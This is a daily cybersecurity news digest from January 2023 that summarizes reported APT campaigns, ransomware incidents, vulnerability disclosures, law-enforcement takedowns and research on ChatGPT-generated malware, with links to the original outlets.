Thursday, January 19, 2023 // (IG): BB // BSidesCharm// Coffee for Bob
Playful Taurus: a Chinese APT active against Iran
FROM THE MEDIA: Palo Alto Networks’ Unit 42 has published a report describing “Playful Taurus” (also known as APT15 or Vixen Panda), a Chinese threat actor known for carrying out cyberespionage campaigns against government and diplomatic entities around the world. In this case, Playful Taurus is targeting government entities in Iran with a new version of its Turian malware. The threat actor appears to have compromised the networks of at least four Iranian government organizations, including Iran’s Ministry of Foreign Affairs. The new version of the threat actor’s malware includes “some additional obfuscation and a modified network protocol.” The researchers conclude, “Playful Taurus continues to evolve their tactics and their tooling. Recent upgrades to the Turian backdoor and new C2 infrastructure suggest that these actors continue to see success during their cyber espionage campaigns.
READ THE STORY: The Cyberwire
Bitzlato crypto exchange seized for ransomware, drugs money laundering
FROM THE MEDIA: The U.S. Department of Justice arrested and charged Russian national Anatoly Legkodymov, the founder of the Hong Kong-registered cryptocurrency exchange Bitzlato, with helping cybercriminals allegedly launder illegally obtained money. Legkodymov was arrested on Tuesday night in Miami and will be arraigned today in the U.S. District Court for the Southern District of Florida. French authorities also dismantled Bitzlato's digital infrastructure as part of an operation where they worked with Europol and partners in Spain, Portugal, and Cyprus. To put things in perspective, according to a Chainalysis report on cryptocurrency-based money laundering activity, Bitzlato received more than 2 billion worth of crypto between 2019 and 2021, over $966 million representing illicit and risky cryptocurrency (amounting to roughly 48% of the total).
READ THE STORY: BleepingComputer // Cyberscoop
Ukraine links data-wiping attack on news agency to Russian hackers
FROM THE MEDIA: The Computer Emergency Response Team of Ukraine (CERT-UA) has linked a destructive malware attack targeting the country's national news agency (Ukrinform) to Sandworm Russian military hackers. "According to preliminary data, provided by CERT-UA specialists, the attack have caused certain destructive effects on the agency's information infrastructure, but the threat has been swiftly localized nonetheless," the State Service of Special Communications and Information Protection (SSSCIP) of Ukraine said. "This enabled Ukrinform to continue its operation. Right now, CERT-UA specialists are assisting in infrastructure recovery and continuing investigation of the incident." CERT-U says the cyberattack was likely carried out by the Sandworm group based on the threat actors' tactics, which was previously linked to the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).
READ THE STORY: BleepingComputer
British and Ukrainian cyber officials meet in London for threat intelligence talks
FROM THE MEDIA: Senior cybersecurity officials from the United Kingdom and Ukraine met for several hours on Wednesday to discuss threat intelligence relating to Russian cyberattacks. The bilateral talks between National Cyber Security Centre (NCSC) staff and a delegation from Ukraine’s State Service of Special Communications and Information Protection (SSSCIP) and its Computer Emergency Response Team (CERT-UA) covered the latest developments in the conflict, although the substance of the meetings was not disclosed. While in London, the Ukrainian delegates also appeared at the CyberThreat conference to give a keynote speech discussing their response to attacks on the country’s critical infrastructure. As reported by The Record earlier this month, CERT-UA has attended to more than 80 critical cybersecurity incidents targeting the country’s energy sector since the beginning of the invasion — all while kinetic attacks caused by cruise missiles and drones have left much of the country without heating during the coldest months of the year.
READ THE STORY: The Record
Earth Bogle Campaign Unleashes NjRAT Trojan on Middle East and North Africa
FROM THE MEDIA: An ongoing campaign dubbed Earth Bogle is leveraging geopolitical-themed lures to deliver the NjRAT remote access trojan to victims across the Middle East and North Africa. "The threat actor uses public cloud storage services such as files[.]fm and failiem[.]lv to host malware, while compromised web servers distribute NjRAT," Trend Micro said in a report published Wednesday. Phishing emails, typically tailored to the victim's interests, are loaded with malicious attachments to activate the infection routine. This takes the form of a Microsoft Cabinet (CAB) archive file containing a Visual Basic Script dropper to deploy the next-stage payload. Alternatively, it's suspected that the files are distributed via social media platforms such as Facebook and Discord, in some cases even creating bogus accounts to serve ads on pages impersonating legitimate news outlets. The CAB files, hosted on cloud storage services, also masquerade as sensitive voice recordings to entice the victim into opening the archives, only for the VBScript to be executed, leading to the retrieval of another VBScript file that masks itself as an image file.
READ THE STORY: THN
Researchers Warn Against Zoho ManageEngine “Spray and Pray” Attacks
FROM THE MEDIA: Security researchers issued a warning about a critically-rated pre-authentication remote code execution (RCE) vulnerability, CVE-2022-47966, in Zoho ManageEngine products – including ServiceDesk Plus 14003 and Endpoint Central version 10.1.2888.10 – here’s what you need to know. According to researchers, an adversary could exploit the Zoho ManageEngine vulnerability if the Security Assertion Markup Language (SAML) single-sign-on is enabled or has ever been enabled. Additionally, this vulnerability is assigned as part of a “spray and pray” campaign in which attackers target organizations at an unprecedented rate in hopes one of their numerous attacks hit the mark. An attacker with root privileges on an affected Zoho ManageEngine endpoint can dump the operating system credentials via Local Security Authority Subsystem Service (LSASS). An adversary can then use the compromised credentials to move laterally within the infected environment leveraging existing public tools.
READ THE STORY: Security Boulevard
Thousands of Sophos firewalls still vulnerable out there to hijacking
FROM THE MEDIA: More than 4,000 public-facing Sophos firewalls remain vulnerable to a critical remote code execution bug disclosed last year and patched months later, according to security researchers. The flaw, CVE-2022-3236, had already been exploited as a zero-day when Sophos published a security advisory about the vulnerability in September 2022. At the time, the vendor said the hole had been abused to target "a small set of specific organizations, primarily in the South Asia region." The vulnerability can be exploited to gain control of a device, which can then be commandeered to probe and attack the network or outside targets. Sophos initially issued a hotfix for some versions of the firewall, and then released an formal update that squashed the bug in December 2022.
READ THE STORY: The Register
Rise of cloud-delivered malware poses key security challenges
FROM THE MEDIA: As more organizations have turned to the cloud to store and work with their data, applications and other assets, cybercriminals are increasingly exploiting cloud-based services to set up malicious downloads. A new report from network security provider Netskope looks at the rise in cloud-delivered malware and provides tips on how to protect your organization from these threats. The shift to hybrid and remote work has led to a greater use of apps such as Microsoft OneDrive, SharePoint and Microsoft Teams, and there was a dramatic rise in the number of users uploading content to these and other cloud-based services in 2022: Last year, more than 25% of people around the world uploaded documents each day to Microsoft OneDrive, 7% to Google Drive and 5% to Microsoft SharePoint.
READ THE STORY: TechRepublic
The MarkdownTime Vulnerability: How to Avoid This DoS Attack on Business Critical Services
FROM THE MEDIA: Everybody is familiar with downtimes in major services. It can be very frustrating when a platform your organization depends upon becomes unavailable. And when it comes to a critical part of your software supply chain, downtime means your production pipeline stops working, and basically, your entire software factory is down. The damage can be very expensive. Now, imagine what would happen if a bad actor finds a vulnerability that allows an unauthenticated user to take down business critical infrastructure with one line of code. In this article, we will explore “MarkDownTime” – a vulnerability we found in a very popular implementation of the markdown engine and the Denial-of-Service (DoS) attack that it could cause on dependent projects, such as GitHub and GitLab. Software supply chains can contain multiple looming threats and vulnerable dependencies. When a popular library is vulnerable to an easy-to-exploit attack, it will potentially cause millions of organizations to be vulnerable.
READ THE STORY: Security Boulevard
Thousands of Nissan customers affected by data breach through third-party vendor
FROM THE MEDIA: Nissan has sent out breach notification letters to thousands of people to inform them of a leak of personal information through a third-party vendor. The car company said it was notified on June 21 that names, dates of birth, and account numbers for Nissan Motor Acceptance Corporation – an indirect lender that helps people finance or lease Nissan vehicles – were exposed after it provided the customer information to an unnamed third party “for software testing.” Nissan’s breach notification letter, which was sent to 17,998 people, does not say when the data was exposed nor for how long. “During our investigation, on September 26, 2022, we determined that this incident likely resulted in unauthorized access or acquisition of our data, including some personal information belonging to Nissan customers.
READ THE STORY: The Record
Illegal Solaris darknet market hijacked by competitor Kraken
FROM THE MEDIA: Solaris, a large darknet marketplace focused on drugs and illegal substances, has been taken over by a smaller competitor named 'Kraken,' who claims to have hacked it on January 13, 2022. The Tor site of Solaris currently redirects to Kraken, while blockchain monitoring experts at Elliptic report no movements in the cryptocurrency addresses associated with the site after January 13, 2022. The Solaris marketplace emerged a few months ago, following the seizure of Hydra, attempting to capture a portion of the then-disturbed market. The new market quickly captured about 25% of the market and processed roughly $150,000,000 in illegal sales. At the start of the year, a Resecurity report on the emergence of novel drug markets claimed that Solaris had received 60,000 new registrations since Hydra's sudden demise, while Kraken only absorbed about 10% of that.
READ THE STORY: BleepingComputer
Polish Cyber Defenses and the Russia-Ukraine War
FROM THE MEDIA: The crisis between NATO countries and Russia following Russia’s invasion of Ukraine has involved aggressive rhetoric, military warnings, sabotage of critical infrastructure, nuclear saber-rattling, and cyberattacks. Experts have warned that international crises are a fertile ground for cyber escalation, including the current conflict in Ukraine. Outside of Ukraine, Poland has been a major target of Russian cyberattacks, both for espionage and disruptive purposes. Poland needs to prepare for a potential Russian escalation in cyberspace by increasing its collaboration with international partners and its cyber defense readiness.
READ THE STORY: CFR
Strengthening cyber resilience in the oil and gas industry
FROM THE MEDIA: The oil and gas industry uses a range of complex systems and interconnected technologies to extract, transport and refine oil and gas products. While these these technologies are necessary to support the delivery of energy services and products, they are increasingly vulnerable to cyberattacks thus making cybersecurity critical to collective resilience. The World Economic Forum's Centre for Cybersecurity launched in 2020 the Cyber Resilience in Oil and Gas initiative as part of its efforts to strengthen cybersecurity across multiple industries. The initiative comprises of a community of over 40 public and private organizations working together to drive forward collective action on cyber resilience. One of the key initiatives of the community is the Cyber Resilience Pledge.
READ THE STORY: World Economic Forum
Pro-Russian hackers say they breached Samsung
FROM THE MEDIA: Genesis Day, a pro-Russian hacktivist group, claims to have breached Samsung’s internal servers over South Korea’s cooperation with NATO. Attackers posted an ad on a popular hacking forum, alleging they breached South Korea’s manufacturing conglomerate Samsung. Threat actors, who call themselves Genesis Day, claim they found their way into Samsung’s internal FTP service, used by Samsung Group in South Korea. “Because South Korea has recently strengthened its cooperation with NATO and targeted other countries. We hacked into the internal FTP service of the Samsung Group in South Korea, “the attackers said. Sample data investigated by the Cybernews research team allegedly includes Samsung’s corporate manuals for logging in, an employee password, and several educational videos. However, the data sample doesn’t strike as containing sensitive data.
READ THE STORY: Cybernews
Law enforcement takes down crypto exchange allegedly used to launder $15 million in ransomware payments
FROM THE MEDIA: The Russian co-founder of a cryptocurrency exchange allegedly used to launder cybercrime proceeds was arrested early Wednesday morning in Miami, the Department of Justice announced. The arrest of Anatoly Legkodymov, who is charged with “unlicensed money transmitting,” is “a significant blow to the cryptocrime ecosystem,” Deputy Attorney General Lisa Monaco said. The exchange, Bitzlato, is based in China and registered in Hong Kong, and Legkodymov is described by the DOJ as a resident of Shenzhen. Legkodymov’s arrest coincided with an international operation against the exchange, including the seizure of its servers. French authorities, alongside Europol and partners in Spain, Portugal, and Cyprus, “dismantled Bitzlato’s digital infrastructure,” the DOJ announcement said. The operation was the first enforcement action led by the National Cryptocurrency Enforcement Team, which was announced in October 2021.
READ THE STORY: The Record
Nozomi Networks Researchers Take a Deep Look into the ICS Threat Landscape
FROM THE MEDIA: Monitoring the constantly-evolving cyber threat landscape is essential in staying up-to-date on the latest threats and potential attack vectors. This allows organizations to anticipate vulnerabilities, proactively harden their systems, and implement countermeasures that can protect against malicious actors. By understanding how their networks may be susceptible to attack, organizations can take action to reduce the likelihood of a successful breach. In the past six months, Nozomi Networks researchers have seen an increase in the number and severity of cyberattacks, disrupting businesses and critical infrastructure around the globe. Railways have been particularly targeted by attackers, necessitating increased protective protocols for rail operators.
READ THE STORY: Security Boulevard
Exploiting CVE-2021-3490 for Container Escapes
FROM THE MEDIA: Today, containers are the preferred approach to deploy software or create build environments in CI/CD lifecycles. However, since the emergence of container solutions and environments like Docker and Kubernetes, security researchers have consistently found ways to escape from containers once they are compromised. Most attacks are based on configuration errors. But it is also possible to escalate privileges and escape to the container’s host system by exploiting vulnerabilities in the host’s operating system. This blog shows how to modify an existing Linux kernel exploit in order to use it for container escapes and how the CrowdStrike Falcon® platform can help to prevent and hunt for similar threats.
READ THE STORY: CrowdStrike
1000 Shipping Vessels Impacted by Ransomware Attack
FROM THE MEDIA: Around 1000 shipping vessels have been impacted by a ransomware attack, a software management company has revealed. DNV, a Norwegian software supplier that provides services for 12,000 ships and mobile offshore units across the globe, said its ShipManager software had been hit by the attack on January 7, 2023. Consequently, around 70 customers operating roughly 1000 vessels have been impacted. These customers “have been advised to consider relevant mitigating measures depending on the types of data they have uploaded to the system.” DNV added that it had informed the impacted parties about their responsibility to notify the relevant data protection authorities in their countries of the incident. However, the firm said “there are no indications that any other data or servers by DNV are affected,” and the server outage has not impacted any of its other services.
READ THE STORY: InfoSecMag
Deep Fakes may replicate digital humans this year
FROM THE MEDIA: When we have a reactive attitude we become extremely vulnerable to digital threats, which puts our businesses and our societies at risk of attackers who are always evolving and looking for ways to gain access. Ransomware, for example, continues to adapt with different enhancements and tactics, and we must always be dynamic and flexible to change. Yet, while some things change others stay constant. Data privacy and security continue to be a top priority. In the new working environment, our homes are becoming an extension of the office. And with continuing cloud adoption, there is a massive expansion of the threatscape. A year ago I made several predictions about topics including Cyberwars, Ransomware, Hacker Esports, Privileged Identity and Zero Trust. Several of them turned out to be fairly accurate, with lessons to be learned moving forward.
READ THE STORY: iTWire
ChatGPT Could Create Polymorphic Malware Wave, Researchers Warn
FROM THE MEDIA: The newly released ChatGPT artificial intelligence bot from OpenAI could be used to usher in a new dangerous wave of polymorphic malware, security researchers warn. One of the many spectacular tricks ChatGPT has been able to pull off is writing highly advanced malware that actually contains no malicious code at all, making it difficult to detect and mitigate, researchers at CyberArk explained in its recent threat research report. The CyberArk team also detailed how the chatbot can be used to both generate injection code, as well as mutate it. This new wave of cheap and easy ChatGPT polymorphic malware is something cybersecurity professionals should pay attention to, the analysis added. "As we have seen, the use of ChatGPT's API within malware can present significant challenges for security professionals," the report said. "It's important to remember, this is not just a hypothetical scenario but a very real concern."
READ THE STORY: DarkReading
ICS Confronted by Attackers Armed With New Motives, Tactics, and Malware
FROM THE MEDIA: The motive of financial and political gain — fueled partially by the ongoing conflict in Ukraine — has emboldened threat actors to barrage industrial control systems (ICS) with ever more disruptive cyberattacks, diversifying the threat landscape for critical infrastructure, new research shows. This trend is expected to continue throughout 2023 with attackers arming themselves with new tactics and malware, forcing ICS operators to level up if they want to protect their networks, according to Nozomi Networks' "OT/IoT Security Report: A Deep Look Into the ICS Threat Landscape" for the second half of 2022, published Jan. 18.
READ THE STORY: DarkReading
New York man defrauded thousands using credit cards sold on dark web
FROM THE MEDIA: A New York resident has pleaded guilty to charges of conspiracy to commit bank fraud using stolen credit cards purchased on dark web cybercrime marketplaces. Trevor Osagie, a 31 year old man from the Bronx, admitted to playing a key role in the operation of a credit card conspiracy group that caused over $1,500,000 in damages to 4,000 account holders. Osagie committed crimes between 2015 and 2018, using a network of co-conspirators in New Jersey/New York, employing various methods to launder their proceeds. The defendant now faces up to 30 years in prison and a maximum fine of $1,000,000, while the sentence is to be decided on May 25, 2023. According to the indictment shared in the U.S. Department of Justice announcement, Osagie purchased thousands of credit and debit card data from dark web markets.
READ THE STORY: BleepingComputer
Avast Releases Free Decryptor for BianLian Ransomware
FROM THE MEDIA: The BianLian Ransomware group targets organizations around the world, with a prime focus on Australia, the United States, and the United Kingdom. Cybersecurity firm Avast’s analysts have released a decryptor for the dangerous BianLian ransomware, which first surfaced in August 2022. Using this decryptor, BianLian victims can retrieve their encrypted data for free and avoid paying the ransom to the attackers. Most of the victims of BianLian ransomware belonged to industries, including healthcare, energy, media, and manufacturing. Organizations worldwide were targeted with ransomware, mainly in the UK, the USA, and Australia. According to Avast’s analysis, the malware operators used the Go programming language to improve its operational capabilities and make it difficult to detect. One of the unique features of BianLian ransomware is the concurrency that allows it to encrypt the data quickly.
READ THE STORY: HackRead
Items of interest
A Comprehensive Guide to IoT Security
FROM THE MEDIA: The Internet of Things, also known as IoT, is a system of interconnected computing devices, mechanical machines, or objects with sensors and software that can transfer or exchange information over a network with no human intervention. IoT security refers to the processes and technologies put in place to prevent or mitigate cyber risks for these devices. The definition of what constitutes an IoT device varies widely and includes everything from biomedical implants to sensors on manufacturing and electrical equipment. An IoT ecosystem can encompass many different smart devices that collect, send and act on data from their environments. Sometimes, these devices even communicate with each other and act on the information they get from one another.
READ THE STORY: Security Boulevard
IoT Hacking—A Practical Guide (Video)
FROM THE MEDIA: In this '401 Access Denied' podcast, authors of "Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things," Beau Woods and Paulino Calderon join us. As we become more connected, how can we improve IoT security and safety?
ChatGPT will make you better (Video)
FROM THE MEDIA: ChatGPT took the world by storm on it’s release in December 2022 and for good reason, it’s an AI that could potentially take all of our jobs!! While that could eventually be true, I’m choosing to take advantage of it and use it to make me better! In this video, I’ll show you the power of ChatGPT and how you can use it as an IT Professional, hacker, network engineer, cloud engineer, to make you look awesome!!
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com